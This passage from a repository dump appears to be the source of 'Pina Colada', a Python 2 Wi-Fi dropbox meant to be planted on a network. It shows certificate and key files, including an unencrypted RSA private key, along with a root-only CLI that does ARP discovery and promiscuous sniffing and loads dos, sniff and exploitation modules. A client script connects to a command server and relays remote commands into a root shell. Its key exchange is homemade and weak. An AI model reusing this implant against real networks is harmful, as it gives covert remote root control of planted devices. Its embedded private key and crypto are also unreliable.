 8 | YSBDb2xhZGEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDF6N9MFZRF
 9 | 47mytzOS46D2vBKY6NZAP8u9jwN8TOnq51BWTpDTTVZJAMLV0CKj5XFOnwu9Y4PR
10 | BrvIpVaXCctfzaalQAkzfYTXGdoHeRX09+vqnBdN7hrQlIkMWaA5LZEEOz/RowwA
11 | 1BtNyIrttnIA1Cia0DTKi1SVpYXQwtlEj4mGscX2B1PHHdpEo2QAjthngecHJ908
12 | GyuUhJnMPeP8hzKdPU3lH5k+dzJXDe5pq/vIw0Z7MamgTjgOV3UptIOpxtTyd5SY
13 | VgIp/XA6DRgy94PwHlEU6GdIlHNdb8tsE1CTd70DXQY6vaKi0ltDnwQ+Bx4FYbsc
14 | a/0Giflcs3WxAgMBAAEwDQYJKoZIhvcNAQEFBQADggEBADGxkFtjNGQEaVSEfrKM
15 | xaa5P7pd/krYcSxYYEOBR8nklx+/Dz9fOR0bQfvBQcyzOGKCGI0YRTKJFj4ovoer
16 | FLsnq08De5STiu06rEwtPFlvSgZkaosHnJg03V4vs9ft11TP04CiYuw5Q0gwogrk
17 | /VwdBQCU/i0qmdOqFxhRBN7czAdHVaJqbqP0p/IzmlksgqpDRFoDpOYouncGKIh+
18 | vhVcLmNp8rE9MNrG1j9rIGB6BYaYB84I/jE8AGQ71HM48pMK4ja/BwR2Fg1PkmOR
19 | aqJ6Y543W2Wog5QMEKDzMFJHN99IKoDCi/Jat6Ttsdtdn7aE/noWB65top/9Orkv
20 | 9dA=
21 | -----END CERTIFICATE-----
22 | 


--------------------------------------------------------------------------------
/cert/server.csr:
--------------------------------------------------------------------------------
 1 | -----BEGIN CERTIFICATE REQUEST-----
 2 | MIIC5jCCAc4CAQAwcTELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx
 3 | ITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEUMBIGA1UECxMLUGlu
 4 | YSBDb2xhZGExFDASBgNVBAMTC1BpbmEgQ29sYWRhMIIBIjANBgkqhkiG9w0BAQEF
 5 | AAOCAQ8AMIIBCgKCAQEAxejfTBWUReO5srczkuOg9rwSmOjWQD/LvY8DfEzp6udQ
 6 | Vk6Q001WSQDC1dAio+VxTp8LvWOD0Qa7yKVWlwnLX82mpUAJM32E1xnaB3kV9Pfr
 7 | 6pwXTe4a0JSJDFmgOS2RBDs/0aMMANQbTciK7bZyANQomtA0yotUlaWF0MLZRI+J
 8 | hrHF9gdTxx3aRKNkAI7YZ4HnByfdPBsrlISZzD3j/IcynT1N5R+ZPncyVw3uaav7
 9 | yMNGezGpoE44Dld1KbSDqcbU8neUmFYCKf1wOg0YMveD8B5RFOhnSJRzXW/LbBNQ
10 | k3e9A10GOr2iotJbQ58EPgceBWG7HGv9Bon5XLN1sQIDAQABoDAwEwYJKoZIhvcN
11 | AQkCMQYTBFBpbmEwGQYJKoZIhvcNAQkHMQwTCnBpbmFjb2xhZGEwDQYJKoZIhvcN
12 | AQEFBQADggEBADOJ0YorERJP2qmpmGXnSL7dHYXc22FJYjMyTIePu6bW5/o/8Y25
13 | 3WeJh5kkcivO9HqajBXq7cWcxlX/SjLrNFFjAKXwZnamw4C4eIY52t0IK8ZMKZVY
14 | Gi7qKGkMZS+Lhvdp19E6uQaCtGH4fe92Kzatoki+urON1lV5VP4DxbyaiE59lEF5
15 | MlkpP+0gcxXuSfGgsP91AnwxZdSHYr7QSL0YzBB9Aw/rPygt7mFOBsQK0GtstWi9
16 | OHT/1WPHS1taeWPyY9xG8htBzMDf1yZ3/Hv5HuDsWv6FVDWNyeom5cAZH8MStnMT
17 | XNqG2Bf1gvH7Ax7XiJw3LtVzG3FLs/RzwDg=
18 | -----END CERTIFICATE REQUEST-----
19 | 


--------------------------------------------------------------------------------
/cert/server.key:
--------------------------------------------------------------------------------
 1 | -----BEGIN RSA PRIVATE KEY-----
 2 | MIIEpAIBAAKCAQEAxejfTBWUReO5srczkuOg9rwSmOjWQD/LvY8DfEzp6udQVk6Q
 3 | 001WSQDC1dAio+VxTp8LvWOD0Qa7yKVWlwnLX82mpUAJM32E1xnaB3kV9Pfr6pwX
 4 | Te4a0JSJDFmgOS2RBDs/0aMMANQbTciK7bZyANQomtA0yotUlaWF0MLZRI+JhrHF
 5 | 9gdTxx3aRKNkAI7YZ4HnByfdPBsrlISZzD3j/IcynT1N5R+ZPncyVw3uaav7yMNG
 6 | ezGpoE44Dld1KbSDqcbU8neUmFYCKf1wOg0YMveD8B5RFOhnSJRzXW/LbBNQk3e9
 7 | A10GOr2iotJbQ58EPgceBWG7HGv9Bon5XLN1sQIDAQABAoIBAQCQTtR7mwSJzZo7
 8 | SUCO6/IT12FMJAMNyDbcmqp0+XRbd51pwVHy8WJoSujGlUSc85GiPXCHAUg9o0ZL
 9 | 8NtpuJeV3NOVjVLoO68gVVZYup8bB6f7YyPPDD57NsOTwMqGxsYGKtnHF7eJ5x+d
10 | oQxEdxM7rXeKIyVLRzs+/vnLFjjstt5CKFXnDtl1V5D0IZ8Nsgry2t8v4aWbyjkB
11 | o361sEmI9mfa8FZPVIlbzMvaHJDTVO9CmUpLsNEVaAvf9sJX25JUkxt/mLD9RUGy
12 | g0iX2B2Z5Oqrh7pNE+MplrVsguh+KPN8TKq7xOGKoUXpqGP6tv4v9hfKJ1MUpMBr
13 | sqwMOnDRAoGBAP8TOmhH0PNBC4azJSkDnXAbz0G2mBRaVdy5mE7tOZ0ct4a1Hm0C
14 | rqq/YgYGQu2N4driE/kFYWVIfkN7mWAM7EEinh1Zu3GsHh9K2vaGFTBSd4YZS5F0
15 | N2JF0kAPbZ9LgVenQEbkKxon/7WoxLw/hUbC5ek4KjN7FXDApP6VVzO1AoGBAMag
16 | lKRnJXj9FF2sZ3N2Afk2F/WIhzoNxQD2rkxVKY5Fvb4EanMmwBsf6bO6RwrHzFJf
17 | Af11EXxOuHqhHhoBacwJ6bY8zPRgAsVL2LUeM4tGIzbUvLiVitaUBGdIlddJUGBi
18 | FpWtoF4xYVNBR5ejgxfw+UwSUq2pFdmOvWh0ju+NAoGABXPqxrnqTJjyXyHLRJIw
19 | NmpRxuzZWW4I8dwB1oYZujMX9Ug/60KoazwGI2zU13E2B9DXbnZf+6NOF7E3uSbt
20 | kgLkcGovqKFuT2rxPV3mbA8HQRWfWO+sE2y8ruPliwc5L5+Cr0FHbpq2S7Lc6c1N
21 | 0xJticvKkykpbyyfGlYk9BUCgYBB0nkvuhbK72NOX5Gwy4x/35M1BNd7P5Dnbtf3
22 | 58jrouTsEV6NZmwHER5LNxHP2sI1EdMBAUiYHyY3TSlCiPFccnSGtcNdwGtqomXg
23 | L2/5WXbV9s3LhZMK5OZIq98sBtmh9x9w3qbkUAzmoB1vfPo2dt7GfNP1RLE+9XSD
24 | Jw0vCQKBgQDpobEFlvmZvUXYE6omZLmLymDsOJW+hkUxptfKbNt1Ru58SBk67/CH
25 | ZL1TFn1Brd/pM6fmI9lf5nilAAqTfczQmjk5gD6LQhblQ3S1WIfsdUDmq3vhAcWk
26 | Oip9aOiL6YUQZAAGbpLivbNnuLNCuMLUOui0Oo5hD8i4BhJMGk+fMg==
27 | -----END RSA PRIVATE KEY-----
28 | 


--------------------------------------------------------------------------------
/cert/server.orig.key:
--------------------------------------------------------------------------------
 1 | -----BEGIN RSA PRIVATE KEY-----
 2 | Proc-Type: 4,ENCRYPTED
 3 | DEK-Info: DES-EDE3-CBC,98430EAE0F503310
 4 | 
 5 | Yhj+r+MilfqTLeq6XIv89pBlBPtaHo4fgC/XBxOuVsIIiNO4S2AvGfZwPqkAxOar
 6 | lC1scSMjqCzyI8vJLpQBBo2aHe/3HtBZl6bCoOgf7wLnmH6Pf6YYKwGigQXyekfT
 7 | okswVqFYK+gOzfknpnYLkRg3vHT3YmQEahlxNFDXiUORolPlSyUykOAlNPZPCt9x
 8 | MvhVJnCEnTAYBDL+VWz00HPz1xCTSFTozWJMVOjs7BaHVSNEdQheIjxj+lOCEk0H
 9 | OQqvmEGWsLk1msEumv20WuNTj+duOqHIqxK94/w6wVGTIBiVcbl+ehgl5m1ZBGgr
10 | 8GwOGdq97j88wG0ZvOVPxS2vk9HQ0tHMlFcKYScY8ftJ5tu1Y0qo/54mG8bflVmt
11 | 5wfEP+zbxki8eabP+SK6Q/8zRVxvOfVy4CPiTrlsMqiNzdvUfxKltGyFGuSN5UZP
12 | g+ondb/G9j6fMqR50OH07Kg6VM9ophHfC/7nqcYwhV8+XOxEXQLP+G8tNGsr80qk
13 | VIGNYW3bmyiRY6xmmdhxD5Sjg22GZJccALqWoa4Rq6QyVlVc/0AloWCmbFY8r394
14 | SEDgppQ/deK32m/AWJRph9Bv2AtACfT5LalB6UXmTwEoML5C5ABPegYaWnWD43of
15 | OVUiW6ar+sc3L/m7+v5DBUYZ9+fYdK6/w7JVNblQCD+DVHj2GvRWLoV+Egr+e21+
16 | YuDgzltWu891I5qbc3xY6/de91k7QryPHHmzQ4rPrrwp+RJZAqtNpcDPulzx/YDS
17 | rClT2T0aAJ2SJ12MDu1nzTGa8J4XbBKg5Q7SQXm4LuThibrkkaSi0VOBvQT9klfy
18 | 76T+n8vXY30Xhkg1le78YCKCrRlHhs7JEQXxcwLMydK3hzUX274FADrym58hAZah
19 | +Nmcabys+9Fof3TPJjHzJ4q/+EtfKOgx14jWmvREysqLRiQBySafKHJFg9ijSwHy
20 | 1UXAb72LLfc6W0vX8H43SXyonZAYD/6xFrvetQFSbASBYgO+4CYxI0R9vFBCeok9
21 | Id6Qn3uyyB/DBHUPc5csTaYnbklwV91ZIH/4vBfk6fo5OdYsb2Ia5xdfM1vTxbNA
22 | 3l5HgzUchlKjF7dQ8KiREBSLQDRYKLAUOSWt5whNsdkni+22Sa3i375LECJH/DcP
23 | dYl3kugUR4zZqkLwa51U/iRjAE4VBerBucJzeXeE/U8/mcjg4r6uVRDkB5vmydLE
24 | 52rAoq/oOw5AQUSLYsxnxUVEQRS7ZHFpXqAH9p7Yg7Y1iAMdn/qieinQHwJBsOCm
25 | I4cjf2KGuCHWvzi7D/NJqeFaPfQsfh9ttHRy3T90LP8LlutbWDicNfm0g0kSdT6Y
26 | Cb5jKn7o03o4g9V/rcSOkOP0HwS8yxhUiC7Tm8r3zNXjGnnLf0ibUairdKKe7CF3
27 | tg3yb+tN7PoQC5PvLQ8xfwYJAAG8hEDYxtr925qJGZPi1olc8sIYRm2wiAUEY1vX
28 | Csvw4fcRSIL89QZt54YBH3EoEWBNdBljCOqf8a8QpogzxPJ61clu7zDu4lmW814m
29 | VV/OJpt/0eF7gitE/QKWVnbsd0Fcm/cMtK00t3KZEZok7xGGIW390D0CKT8pWFXX
30 | -----END RSA PRIVATE KEY-----
31 | 


--------------------------------------------------------------------------------
/cli.py:
--------------------------------------------------------------------------------
  1 | import os
  2 | import cmd
  3 | import sys
  4 | import traceback
  5 | import netifaces as ni
  6 | import core
  7 | from network import *
  8 | 
  9 | from colorama import *
 10 | from Tkinter import *
 11 | from capabilities import *
 12 | 
 13 | GOOD = Fore.GREEN + " + " + Fore.RESET
 14 | BAD = Fore.RED + " - " + Fore.RESET
 15 | WARN = Fore.YELLOW + " * " + Fore.RESET
 16 | INFO = Fore.BLUE + " + " + Fore.RESET
 17 | 
 18 | class PinaColadaCLI(cmd.Cmd):
 19 |     prompt = Fore.BLUE + ">> " + Fore.RESET
 20 |     
 21 |     def __init__(self):
 22 |         cmd.Cmd.__init__(self)
 23 |         self.core = core.PinaColada()
 24 |         self.ctrlc = False
 25 |         self.ascii_art()
 26 |         print "Welcome to Pina Colada, a powerful Wifi Dropbox. Type \"help\" to see the list of available commands."
 27 |         print "Defaulting to interface %s (%s)." % (self.core.default_iface, self.core.get_local_ip(self.core.default_iface))
 28 | 
 29 |     def ascii_art(self):
 30 |         print "    ____  _  /\//          ______      __          __        ' ."    
 31 |         print "   / __ \(_)//\/ ____ _   / ____/___  / /___ _____/ /___ _   \~~~/"
 32 |         print "  / /_/ / / __ \/ __ `/  / /   / __ \/ / __ `/ __  / __ `/    \_/"
 33 |         print " / ____/ / / / / /_/ /  / /___/ /_/ / / /_/ / /_/ / /_/ /      Y"
 34 |         print "/_/   /_/_/ /_/\__,_/   \____/\____/_/\__,_/\__,_/\__,_/      _|_"
 35 | 
 36 |     def print_help(self, lst):
 37 |         it = iter(lst)
 38 |         for x in it:
 39 |             print("{0:<20} {1:<25}".format(x, next(it)))
 40 |     
 41 |     def do_help(self, args):
 42 |         print "\nAvailable commands are: "
 43 |         print "======================="
 44 |         self.print_help(["list", "lists currently loaded targets, available capabilities, and enabled modules.", "quit", "quits","use <capability>", "engages a capability for use. Run \"list\" or \"list capabilities\" for a full list of capabilities.", "network", "shows all computers on the network", "discover", "use arp to discover all computers on the network and write to database", "wifi", "finds all wifi networks", "interface", "change interfaces", "promisc <enable/disable>", "enable or disable promiscuous mode", ])
 45 |     
 46 |     def do_quit(self, args):
 47 |         self.quit()
 48 | 
 49 |     def do_clear(self, args):
 50 |         os.system("clear")
 51 |         
 52 |     def do_use(self, args):
 53 |         cap = self.core.instantiate(args)
 54 |         if cap is None:
 55 |             print(BAD + "This module could not be loaded, or an unexpected error occurred.")
 56 |             return
 57 |         cli = CapabilityInterface(self, cap).cmdloop()
 58 | 
 59 |     def do_wifi(self, args):
 60 |         self.core.get_wifis()
 61 | 
 62 |     def do_network(self, args):
 63 |         self.core.network.cur.execute("Select * from computers ORDER BY ip ASC")
 64 |         print "ID\tIP\t\tMAC\t\t\tPorts\tLast Date"
 65 |         for computer in self.core.network.cur.fetchall():
 66 |             print str(computer[0]) + "\t" + str(computer[1]) + "\t" + str(computer[2]) + "\t" + str(computer[3]) + "\t" + str(computer[4])
 67 |             
 68 |     def do_interface(self, args):
 69 |         if not args:
 70 |             print "Available interfaces: %s" % ", ".join(self.core.get_available_interfaces())
 71 |             return
 72 |         if self.core.set_interface(args):
 73 |             print GOOD + "Successfully changed interface to %s. Using local IP %s." % (args, self.core.localIP)
 74 |         else:
 75 |             print BAD + "Could not use interface %s. (Is it enabled, and have an IP address?)" % (args)
 76 | 
 77 |     def do_promisc(self, args):
 78 |         if args == "enable":
 79 |             self.core.promisc()
 80 |             print GOOD + "Promiscuous mode enabled for interface %s." % self.core.default_iface
 81 |         elif args == "disable":
 82 |             self.core.promisc(enable=False)
 83 |             print GOOD + "Promiscuous mode disabled for interface %s." % self.core.default_iface
 84 |         else:
 85 |             print BAD + "Unknown option %s. Usage: promisc <enable|disable>" % args
 86 | 
 87 | 
 88 |     def complete_use(self, text, line, begin_index, end_index):
 89 |         line = line.rsplit(" ")[1]
 90 |         segment = line.split("/")
 91 |         if len(segment) == 1:
 92 |             categories = self.core.get_categories()
 93 |             opts = [item+"/" for item in categories if item.startswith(text)]
 94 |             if opts == []:
 95 |                 return [category+"/"+item for category in categories for item in self.core.get_capabilities(category) if item.startswith(text)]
 96 |             return opts
 97 |         if len(segment) == 2:
 98 |             bds = self.core.get_capabilities(segment[0]) 
 99 |             return [item for item in bds if item.startswith(text)]
100 | 
101 |     def do_discover(self, args):
102 |         self.core.network.profile()
103 |         self.core.network.write_db()
104 |         self.do_network("non")
105 | 
106 |     def do_list(self, args):
107 |         if args == "capabilities" or len(args) == 0:
108 |             print(GOOD+ "Available capabilities: ")
109 |             for cat in self.core.get_categories():
110 |                 caps = self.core.get_capabilities(cat)
111 |                 if caps != []:
112 |                     print(" " + INFO + cat)
113 |                 for cap in caps:
114 |                     print("   - " + cap)
115 |         
116 |         if len(args) != 0 and args != "targets" and args != "capabilities" and args != "modules":
117 |             print(BAD + "Unknown option " + args)
118 | 
119 |     def preloop(self):
120 |         cmd.Cmd.preloop(self)   ## sets up command completion
121 |         self._hist    = []      ## No history yet
122 |         self._locals  = {}      ## Initialize execution namespace for user
123 |         self._globals = {}
124 | 
125 |     def do_history(self, args):
126 |         print self._hist
127 | 
128 |     def do_exit(self, args):
129 |         self.quit()
130 | 
131 |     def precmd(self, line):
132 |         self._hist += [line.strip()]
133 |         self.ctrlc = False
134 |         return line
135 |         
136 |     def default(self, line):       
137 |         try:
138 |             print GOOD + "Executing \"" + line + "\""
139 |             os.system(line)
140 |         except Exception, e:
141 |             print e.__class__, ":", e 
142 |     
143 |     def cmdloop(self):
144 |         try:
145 |             cmd.Cmd.cmdloop(self)
146 |         except KeyboardInterrupt:
147 |             if not self.ctrlc: 
148 |                 self.ctrlc = True
149 |                 print("\n" + BAD + "Please run \"quit\" or \"exit\" to exit, or press Ctrl-C again.")
150 |                 self.cmdloop()
151 |             else:
152 |                 print("")
153 |                 self.quit()            
154 |     
155 |     def do_EOF(self, _):
156 |         quit()
157 |         return
158 |     
159 |     def emptyline(self):
160 |         return
161 |     
162 |     def quit(self):
163 |         print(BAD + "Exiting...")
164 |         self.core.network.cur.commit()
165 |         self.core.network.cur.close()
166 |         exit()
167 |         return
168 | 
169 | 
170 | def main():
171 |     PinaColadaCLI().cmdloop()
172 | 
173 | 
174 | if __name__ == "__main__":
175 |     if os.getuid() != 0:
176 |         print BAD + "Please run me as root!"
177 |         sys.exit()
178 |     main()
179 | 


--------------------------------------------------------------------------------
/client.py:
--------------------------------------------------------------------------------
  1 | import socket
  2 | import threading
  3 | import sys
  4 | import os
  5 | import base64
  6 | import random
  7 | import ssl
  8 | import traceback
  9 | import core
 10 | import pexpect
 11 | import re
 12 | 
 13 | from colorama import *
 14 | from Crypto.Cipher import AES
 15 | from Crypto import Random
 16 | from datetime import datetime
 17 | 
 18 | GOOD = Fore.GREEN + " + " + Fore.RESET
 19 | BAD = Fore.RED + " - " + Fore.RESET
 20 | WARN = Fore.YELLOW + " * " + Fore.RESET
 21 | INFO = Fore.BLUE + " + " + Fore.RESET
 22 | prompt = Fore.BLUE + ">> " + Fore.RESET
 23 | 
 24 | SERVER_PORT = 9999
 25 | SERVER_IP = "127.0.0.1"
 26 | 
 27 | ERR_MSG = BAD + "Lost server connection. Please try again later."
 28 | SEP = "|:|"
 29 | END_SEP = "~"
 30 | 
 31 | ####################################################################
 32 | #
 33 | # Message Types
 34 | #
 35 | ####################################################################
 36 | 
 37 | MSG = 0
 38 | GET = 1
 39 | CLOSE = 2
 40 | INFO = 3
 41 | REQ = 4
 42 | 
 43 | CLI_INIT = 10
 44 | CLI = 11
 45 | CLI_RESP = 12
 46 | 
 47 | BS = 16
 48 | pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
 49 | unpad = lambda s : s[0:-ord(s[-1])]
 50 | 
 51 | replace_seps = lambda m: m.replace("|::|", SEP).replace("!::!", END_SEP)
 52 | save_seps = lambda m: m.replace(SEP, "|::|").replace(END_SEP, "!::!")
 53 | 
 54 | def get_date():
 55 |     return "%02d:%02d:%02d" % (datetime.now().hour, datetime.now().minute, datetime.now().second)
 56 | 
 57 | 
 58 | class PinaColadaSocket(object):
 59 |     def __init__(self, name, target_port, server_ip):
 60 |         self.port = target_port
 61 |         self.ip = server_ip
 62 |         self.name = name
 63 |         self.socket = None
 64 |         self.core = core.PinaColada()
 65 |         self.keys = {}
 66 |         self.conn = None
 67 |         self.cli = None
 68 |         print "[*] Attempting to connect to server"
 69 | 
 70 |     def connect(self):
 71 |         client = None
 72 |         try:
 73 |             #s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 74 |             #s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
 75 |             #client = ssl.wrap_socket(s, ca_certs="cert/server.crt", cert_reqs=ssl.CERT_REQUIRED)
 76 |             client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 77 |             client.connect((self.ip, self.port))
 78 |             self.socket = client
 79 |             shared_prime, shared_base = client.recv(10).split("|")
 80 |             shared_prime = int(shared_prime)
 81 |             shared_base = int(shared_base.replace("~", ""))
 82 |             client_secret = random.randint(0, 99)
 83 |             a = long(client.recv(1024).replace("~", ""))
 84 |             b = (shared_base**client_secret) % shared_prime
 85 |             client.send("%ld" % b)
 86 |             self.keys[client] = pad("%ld" % ((a ** client_secret) % shared_prime))
 87 |             client.settimeout(None)  # Remove the timeout
 88 |             self.send(MSG, "0", "PinaColada")
 89 |             print("[*] Successfully connected.")
 90 |             self.receive(client)
 91 | 
 92 | 
 93 | 
 94 | 
 95 |         except Exception as e:
 96 |             print e
 97 |             print traceback.print_exc()
 98 |             raw_input("")
 99 |         finally:
100 |             self.shutdown()
101 | 
102 |     def shutdown(self):
103 |         print GOOD + "Exiting..."
104 | 
105 |     ####################################################################
106 |     #
107 |     # Message Handling
108 |     #
109 |     ####################################################################
110 | 
111 |     def get(self, request):
112 |         reqs = request.split()
113 |         if request == "help":
114 |             return "help message"  # TODO
115 |         if request == "categories":
116 |             return self.core.get_categories()
117 |         if "capabilities" in request:
118 |             return self.core.get_capabilities(category=reqs[1])  # TODO POTENTIAL BUG
119 |         if request == "ip":
120 |             return self.core.get_local_ip(self.core.default_iface)  # TODO ADD INTERFACES
121 |         if request == "list":
122 |             info = {}
123 |             for cat in self.core.get_categories():
124 |                 caps = self.core.get_capabilities(cat)
125 |                 if caps != []:
126 |                     info[cat] = []
127 |                 for cap in caps:
128 |                     info[cat].append(cap)
129 |             return info
130 | 
131 |     def cli_init(self):
132 |         if self.cli:
133 |             self.cli.terminate(force=True)
134 |         self.cli = pexpect.spawn("sudo python cli.py")
135 |         self.cli.expect(re.escape(prompt))
136 |         return self.cli.before + prompt
137 | 
138 |     def cli_communicate(self, data):
139 |         self.cli.sendline(data)
140 |         self.cli.expect(re.escape(prompt))
141 |         return "\n".join(self.cli.before.split("\n")[1:]) + prompt
142 | 
143 |     def send(self, message_type, requester, data):
144 |         #print "SENDING: <%d, %s>" %(message_type, data)
145 |         self.socket.send(self.encrypt(self.pack_data(message_type, requester, data), self.socket) + "\n")
146 | 
147 |     def encrypt(self, string, sock):
148 |         iv = Random.new().read(AES.block_size)
149 |         cipher = AES.new(self.keys[sock], AES.MODE_CBC, iv)
150 |         return base64.b64encode(iv + cipher.encrypt(pad(string)))
151 | 
152 |     def decrypt(self, msg, sock):
153 |         enc = base64.b64decode(msg)
154 |         cipher = AES.new(self.keys[sock], AES.MODE_CBC, enc[:16])
155 |         return unpad(cipher.decrypt(enc[16:]))
156 | 
157 |     def unpack_data(self, msg):
158 |         msgs = [replace_seps(s) for s in msg.split(SEP)]
159 |         try:
160 |             msgs[0] = int(msgs[0])  # convert type to int
161 |         finally:
162 |             return msgs
163 | 
164 |     def pack_data(self, message_type, name, data):
165 |         return str(message_type) + SEP + save_seps(name) + SEP + save_seps(data) + END_SEP
166 | 
167 |     def print_msg(self, message):
168 |        print message
169 | 
170 |     def handle(self, data):
171 |         message_type, name, d = self.unpack_data(data)
172 |         print "DATA FOR CLI: %s" % d
173 |         message_type = int(message_type)
174 |         print message_type, name, d
175 |         if message_type == CLI_INIT:
176 |             self.send(CLI_RESP, name, self.cli_init())
177 |         if message_type == CLI:
178 |             self.send(CLI_RESP, name, self.cli_communicate(d))
179 |         self.print_msg(data)
180 |     ####################################################################
181 |     #
182 |     # Receive Handling
183 |     #
184 |     ####################################################################
185 | 
186 |     def receive(self, sock):
187 |         try:
188 |             while True:
189 |                 data = sock.recv(1024)
190 |                 msgs = filter(None, self.decrypt(data, sock).split(END_SEP))
191 |                 for m in msgs:
192 |                     self.handle(m)
193 |         except Exception as e:
194 |             print e
195 |             traceback.print_exc()
196 |             sock.close()
197 |         finally:
198 |             sock.close()
199 |             self.shutdown()
200 | 
201 | if __name__ == "__main__":
202 |     if os.getuid() != 0:
203 |         print BAD + "Please run me as root!"
204 |         sys.exit()
205 |     PinaColadaSocket("Client", SERVER_PORT, SERVER_IP).connect()
206 | 


--------------------------------------------------------------------------------
/core.py:
--------------------------------------------------------------------------------
  1 | import sys
  2 | import os
  3 | import logging
  4 | import netifaces as ni
  5 | import importlib
  6 | import inspect
  7 | import socket
  8 | import fcntl
  9 | import struct
 10 | import netaddr
 11 | 
 12 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 13 | 
 14 | import network
 15 | import traceback
 16 | 
 17 | from pythonwifi.iwlibs import Wireless
 18 | from capabilities import *
 19 | from scapy.all import *
 20 | from network import *
 21 | sys.path.append("capabilities")
 22 | 
 23 | class PinaColada(object):
 24 |     
 25 |     def __init__(self):
 26 |         self.interfaces = self.get_available_interfaces()
 27 |         self.default_iface = self.interfaces[0]
 28 |         self.localIP = self.get_local_ip(self.default_iface)
 29 |         self.network = network.init_network(self)
 30 |         self.cur = self.network.cur
 31 |         self.categories = None
 32 |         self.loaded_capabilities = {}
 33 |         self.cnc = self.localIP  # TODO
 34 | 
 35 |     def get_available_interfaces(self):
 36 |         interfaces = ni.interfaces()
 37 |         available = []
 38 |         for iface in interfaces:
 39 |             if ni.AF_INET in ni.ifaddresses(iface) and "lo" not in iface:
 40 |                 available.append(iface)
 41 |         return available
 42 | 
 43 |     def set_interface(self, iface):
 44 |         if iface in ni.interfaces() and ni.AF_INET in ni.ifaddresses(iface):
 45 |             self.default_iface = iface
 46 |             self.localIP = self.get_local_ip(self.default_iface)
 47 |             return True
 48 |         else:
 49 |             return None
 50 | 
 51 |     def get_local_ip(self, iface):
 52 |         addrs = ni.ifaddresses(iface)
 53 |         ipinfo = addrs[socket.AF_INET][0]
 54 |         return ipinfo['addr']
 55 | 
 56 | 
 57 |     def get_local_mac(self, iface):
 58 |         return ni.ifaddresses(iface)[ni.AF_LINK][0]['addr']
 59 | 
 60 |     def get_cidr(self, iface):
 61 |         addrs = ni.ifaddresses(iface)
 62 |         ipinfo = addrs[socket.AF_INET][0]
 63 |         address = ipinfo['addr']
 64 |         netmask = ipinfo['netmask']
 65 |         return netaddr.IPNetwork('%s/%s' % (address, netmask))
 66 | 
 67 |     def walk(self, folder, echo=False):
 68 |         bds = []
 69 |         if echo:
 70 |             print(" " + INFO + folder.replace("capabilities/", ""))
 71 |         for root, dirs, files in os.walk(folder):
 72 |             del dirs[:] # walk down only one level
 73 |             path = root.split('/')
 74 |             for file in files:
 75 |                 if file[-3:] == ".py" and file != "__init__.py" and not file.startswith("util_"):
 76 |                     bds.append(str(file).replace(".py", ""))
 77 |                     if echo:
 78 |                         print (len(path)*'  ') + "-", str(file).replace(".py", "")
 79 |         return bds
 80 | 
 81 |     def reload(self):
 82 |         pass
 83 | 
 84 |     def promisc(self, enable=True):
 85 |         if enable:
 86 |             os.system("ifconfig %s promisc" % self.default_iface)
 87 |         else:
 88 |             os.system("ifconfig %s -promisc" % self.default_iface)
 89 | 
 90 |     def get_categories(self):
 91 |         return ["auxiliary", "dos", "arp", "enumeration", "sniff", "exploitation", "scan"]
 92 | 
 93 |     def beacon(self, pkt):
 94 |         ap_list = []
 95 |         if pkt.haslayer(Dot11):
 96 |             if pkt.type == 0 and pkt.subtype == 8:
 97 |                 if pkt.addr2 not in ap_list:
 98 |                     ap_list.append(pkt.addr2)
 99 |                     print "AP MAC: %s with SSID: %s " % (pkt.addr2, pkt.info)
100 | 
101 |     def get_wifis(self):
102 |         print GOOD + "Sniffing for Wifi Beacons"
103 |         for network in wifi_scan():
104 |             print network
105 | 
106 | 
107 |     def get_capabilities(self, category=None):
108 |         caps = []
109 |         if category is None:
110 |             for cat in self.get_categories():
111 |                 caps += self.walk("capabilities/"+cat)
112 |             return caps
113 |         else:
114 |             return self.walk("capabilities/"+category)
115 | 
116 |     def instantiate(self, args):
117 |         try:
118 |             bd = args.split()[0]
119 |             loc, bd = bd.rsplit("/", 1)
120 |             if "capabilities/" + loc not in sys.path: 
121 |                 sys.path.insert(0, "capabilities/" + loc)
122 |             if bd not in self.loaded_capabilities:
123 |                 mod = importlib.import_module(bd)
124 |                 clsmembers = inspect.getmembers(sys.modules[bd], inspect.isclass)
125 |                 cap = [m for m in clsmembers if m[1].__module__ == bd][0][1](self)
126 |                 self.loaded_capabilities[bd] = cap
127 |                 return cap
128 |             else:
129 |                 return self.loaded_capabilities[bd]
130 |         except Exception as e:
131 |             #print e
132 |             #traceback.print_exc()
133 |             return None
134 | 


--------------------------------------------------------------------------------
/network.py:
--------------------------------------------------------------------------------
  1 | from scapy.all import *
  2 | import logging
  3 | import psycopg2
  4 | import time
  5 | import datetime
  6 | 
  7 | 
  8 | #Scan all networks in wifi range and return an array of all of them.
  9 | def wifi_scan():
 10 |     proc = subprocess.Popen(["iwlist wlan0 scan | grep ESSID | sort | uniq | awk -F \"\\\"\" \'{print $2}\'"], stdout=subprocess.PIPE, shell=True)
 11 |     networks = proc.stdout.read()[:-1].split('\n')
 12 |     networks2 = []
 13 |     for item in networks:
 14 |         valid = False
 15 |         for char in item:
 16 |             if char != '\\' and char != '0' and char != 'x':
 17 |                 valid = True
 18 |             else:
 19 |                 if valid == True:
 20 |                     valid = True
 21 |                 else:
 22 |                     valid = False
 23 |         if item == "" or valid == False:
 24 |             networks2.append("Hidden Network")
 25 |         else:
 26 |             networks2.append(item)
 27 |     return networks2
 28 | 
 29 | #All other computers should be in an array of type computer, having (so far) an ip and a MAC address.
 30 | class Computer(object):
 31 |     def __init__(self, ip, mac):
 32 |         self.ip = ip
 33 |         self.mac = mac
 34 | 
 35 | 
 36 | # The overall object, called master, creates its own ip, subnet, and list of other computers on the network.
 37 | # Fields:
 38 | #   ip -> the ip of this computer
 39 | #   subnet -> the cidr
 40 | #   otherComps -> a result of running arping against the network (gives back unparsed packets)
 41 | #   comps -> A list of the computers on the network
 42 | 
 43 | class Network(object):
 44 | 
 45 |     def __init__(self, core):
 46 |         self.core = core
 47 |         self.iface = self.core.default_iface  # TODO
 48 |         self.ip = self.core.get_local_ip(self.iface)
 49 |         self.cidr = self.core.get_cidr(self.iface)
